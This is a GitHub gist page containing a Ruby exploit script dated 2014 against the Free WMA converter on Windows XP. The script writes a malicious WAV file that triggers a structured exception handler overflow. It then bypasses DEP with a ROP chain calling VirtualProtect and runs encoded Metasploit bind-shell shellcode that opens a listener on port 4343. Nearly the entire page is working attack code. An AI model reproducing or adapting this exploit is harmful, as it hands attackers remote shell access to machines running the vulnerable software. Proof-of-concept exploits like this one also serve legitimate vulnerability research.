Skip to content

Instantly share code, notes, and snippets.

@mfadzilr

mfadzilr/freewma-seh-dep-bypass.rb

Created November 12, 2014 08:40
Show Gist options
  • Save mfadzilr/eb2d9a67ff1e6cbd1ae4 to your computer and use it in GitHub Desktop.
Save mfadzilr/eb2d9a67ff1e6cbd1ae4 to your computer and use it in GitHub Desktop.
Download ZIP
FreeWMA SEH DEP Bypass Exploit
Raw
freewma-seh-dep-bypass.rb
#!/usr/bin/env ruby
# encoding: utf-8
# Author : Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Date : 01/11/2014
# Tested on windows xp sp 3 (en)
# Free WMA SEH exploit (DEP Bypass)
seh = 4104
stackpivot = 88
buf = "A" * 5000
# Metasploit shell bind port 4343
# ./msfvenom -p windows/shell/bind_tcp LHOST=0.0.0.0 LPORT=4343 -e x86/shikata_ga_nai -f ruby
bind_tcp =
"\xd9\xe5\xd9\x74\x24\xf4\xba\xee\xb9\x13\x76\x5b\x31\xc9" +
"\xb1\x56\x83\xeb\xfc\x31\x53\x14\x03\x53\xfa\x5b\xe6\x8a" +
"\xea\x15\x09\x73\xea\x45\x83\x96\xdb\x57\xf7\xd3\x49\x68" +
"\x73\xb1\x61\x03\xd1\x22\xf2\x61\xfe\x45\xb3\xcc\xd8\x68" +
"\x44\xe1\xe4\x27\x86\x63\x99\x35\xda\x43\xa0\xf5\x2f\x85" +
"\xe5\xe8\xdf\xd7\xbe\x67\x4d\xc8\xcb\x3a\x4d\xe9\x1b\x31" +
"\xed\x91\x1e\x86\x99\x2b\x20\xd7\x31\x27\x6a\xcf\x3a\x6f" +
"\x4b\xee\xef\x73\xb7\xb9\x84\x40\x43\x38\x4c\x99\xac\x0a" +
"\xb0\x76\x93\xa2\x3d\x86\xd3\x05\xdd\xfd\x2f\x76\x60\x06" +
"\xf4\x04\xbe\x83\xe9\xaf\x35\x33\xca\x4e\x9a\xa2\x99\x5d" +
"\x57\xa0\xc6\x41\x66\x65\x7d\x7d\xe3\x88\x52\xf7\xb7\xae" +
"\x76\x53\x6c\xce\x2f\x39\xc3\xef\x30\xe5\xbc\x55\x3a\x04" +
"\xa9\xec\x61\x41\x1e\xc3\x99\x91\x08\x54\xe9\xa3\x97\xce" +
"\x65\x88\x50\xc9\x72\xef\x4b\xad\xed\x0e\x73\xce\x24\xd5" +
"\x27\x9e\x5e\xfc\x47\x75\x9f\x01\x92\xda\xcf\xad\x4c\x9b" +
"\xbf\x0d\x3c\x73\xaa\x81\x63\x63\xd5\x4b\x12\xa3\x1b\xaf" +
"\x77\x44\x5e\x4f\x67\x63\xd7\xa9\xed\x9b\xbe\x62\x99\x59" +
"\xe5\xba\x3e\xa1\xcf\x96\x97\x35\x47\xf1\x2f\x39\x58\xd7" +
"\x1c\x96\xf0\xb0\xd6\xf4\xc4\xa1\xe9\xd0\x6c\xab\xd2\xb3" +
"\xe7\xc5\x91\x22\xf7\xcf\x41\xc6\x6a\x94\x91\x81\x96\x03" +
"\xc6\xc6\x69\x5a\x82\xfa\xd0\xf4\xb0\x06\x84\x3f\x70\xdd" +
"\x75\xc1\x79\x90\xc2\xe5\x69\x6c\xca\xa1\xdd\x20\x9d\x7f" +
"\x8b\x86\x77\xce\x65\x51\x2b\x98\xe1\x24\x07\x1b\x77\x29" +
"\x42\xed\x97\x98\x3b\xa8\xa8\x15\xac\x3c\xd1\x4b\x4c\xc2" +
"\x08\xc8\x7c\x89\x10\x79\x15\x54\xc1\x3b\x78\x67\x3c\x7f" +
"\x85\xe4\xb4\x00\x72\xf4\xbd\x05\x3e\xb2\x2e\x74\x2f\x57" +
"\x50\x2b\x50\x72"
sc = bind_tcp.force_encoding("utf-8")
rop_gadgets =
[
0x004717fe, # POP ECX # RETN [Wmpcon.exe]
0x77c11120, # ptr to &VirtualProtect() [IAT msvcrt.dll]
0x00415638, # MOV EDX,DWORD PTR DS:[ECX] # MOV EAX,EDX # RETN [Wmpcon.exe]
0x0042608a, # PUSH EDX # OR AL,5F # POP ESI # POP EBX # RETN
0x00488AAD, # RETN (Filler)
0x004a97a3, # POP EBP # RETN [Wmpcon.exe]
0x004495e9, # & jmp esp [Wmpcon.exe]
0x00488AAD, # RETN (Filler)
0x004504cf, # POP EBX # RETN [Wmpcon.exe]
0x00000201, # 0x00000201-> ebx
0x1002b339, # POP EDX # RETN [lame_enc.dll]
0x00000040, # 0x00000040-> edx
0x100228b6, # POP ECX # RETN [lame_enc.dll]
0x004cfa01, # &Writable location [Wmpcon.exe]
0x1002dcde, # POP EDI # RETN [lame_enc.dll]
0x0040d987, # RETN (ROP NOP) [Wmpcon.exe]
0x1002d95d, # POP EAX # RETN [lame_enc.dll]
0x90909090, # nop
0x004ada2d, # PUSHAD # RETN [Wmpcon.exe]
].flatten.pack("V*").force_encoding("utf-8")
payload = "\x90".force_encoding("utf-8") * 20
payload << sc
buf[stackpivot,rop_gadgets.length] = rop_gadgets
buf[stackpivot+rop_gadgets.length,payload.length] = payload
buf[seh,4] = [0x0040c192].pack('V').force_encoding("utf-8") # add esp,444
begin
File.open("xgb.wav","w") do |fp|
fp.write buf
puts "file size: #{buf.length}"
puts "sc size: #{sc.length}"
fp.close
end
rescue Exception => e
puts e
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment